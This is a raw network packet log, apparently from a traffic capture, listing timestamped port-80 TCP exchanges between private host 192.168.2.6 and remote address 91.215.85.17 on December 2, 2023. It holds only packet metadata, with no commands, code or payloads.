                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975219965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975219965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975230932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975235939 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975241899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975264072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975264072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975275040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975281954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975286961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975313902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975348949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975389004 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975419044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975430965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975451946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975464106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975469112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975500107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975517035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975528002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975539923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975550890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975567102 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975606918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975613117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975624084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975634098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975645065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975655079 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975676060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975728989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975765944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975775957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975786924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975804090 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975827932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975868940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975898981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975934029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975984097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.975995064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976006985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976016998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976028919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976032972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976042032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976059914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976062059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976074934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976089001 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976098061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976116896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976171017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976183891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976193905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976205111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976212025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976238012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976253986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976293087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976314068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976325035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976336002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976362944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976391077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976402998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976430893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976433992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976463079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976474047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976530075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976560116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976572037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976573944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976583958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976614952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976664066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976677895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976687908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976699114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976711988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976732969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976767063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976779938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976790905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976802111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976808071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976814032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976824999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976855040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976885080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976917982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976957083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976974010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976986885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.976996899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977006912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977019072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977025986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977039099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977076054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977088928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977116108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977132082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977144003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977170944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977194071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977205992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977232933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977245092 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977261066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977283955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977289915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977332115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977332115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977359056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977391005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977401018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977406025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977416039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977430105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977442980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977442980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977468014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977488041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977529049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977611065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977623940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977633953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977643967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977663994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977673054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977684975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977714062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977725029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977735996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977756977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977767944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977806091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977818012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977828979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977849960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977860928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977896929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977927923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977938890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977950096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977960110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977971077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977979898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.977989912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978041887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978054047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978084087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978094101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978106022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978127956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978148937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978184938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978229046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978240967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978251934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978261948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978276014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978296995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978307009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978378057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978389025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978403091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978414059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978414059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978445053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978457928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978468895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978496075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978534937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978547096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978569984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978571892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978580952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978593111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978602886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978610039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978637934 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978729963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978740931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978751898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978763103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978766918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978796005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978836060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978847027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978857040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978868008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978878021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978880882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978907108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978923082 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978936911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978948116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978960037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978984118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.978998899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979037046 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979053974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979087114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979096889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979123116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979142904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979156017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979166985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979177952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979188919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979192972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979217052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979240894 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979262114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979274035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979284048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979309082 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979351997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979392052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979414940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979428053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979439020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979466915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979496956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979537010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979562044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979604006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979615927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979641914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979645967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979657888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979692936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979737043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979748964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979779005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979809999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979821920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979830980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979842901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979850054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979854107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979866028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979876041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979876995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979887009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979897022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979913950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979922056 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979953051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979967117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979978085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.979988098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980007887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.980122089 CET804972091.215.85.17192.168.2.6
